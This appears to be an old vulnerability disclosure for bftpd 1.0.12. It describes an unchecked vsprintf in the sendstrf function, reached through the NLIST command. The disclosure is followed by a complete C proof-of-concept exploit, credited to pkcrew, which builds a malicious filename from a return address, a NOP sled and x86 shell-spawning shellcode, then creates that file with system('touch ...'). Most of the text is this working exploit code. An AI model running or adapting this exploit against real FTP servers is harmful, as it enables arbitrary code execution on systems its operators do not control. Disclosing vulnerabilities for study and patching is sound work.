There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf:

int sendstrf(int s, char *format, ...) {
 ....
  vsprintf(buffer, format, val);

when the function is called from NLIST command:

  else
      foo = 1;
      sendstrf(s, entry->d_name);
    }

This can be used to overflow the buffer of the vsprintf and execute
arbitrary code. I don't think it can be normally used for a remote attack
because bftpd removes all non-printable characters from input strings and
so it is not possible to remotely put a shellcode in a filename.
A dimostrative code is attached.


asynchro@pkcrew.org
www.pkcrew.org









/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)

hints by |CyRaX| & Cthulhu
coded by asynchro

www.pkcrew.org
*/

#include <stdlib.h>
#include <unistd.h>

#define BUFSIZE 512
#define NOP 124

main()
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";


buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));

strncat(buff,addr,4);
strncat(buff,addr,4);

for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}

strncat(buff,shellcode,strlen(shellcode));
system(buff);
}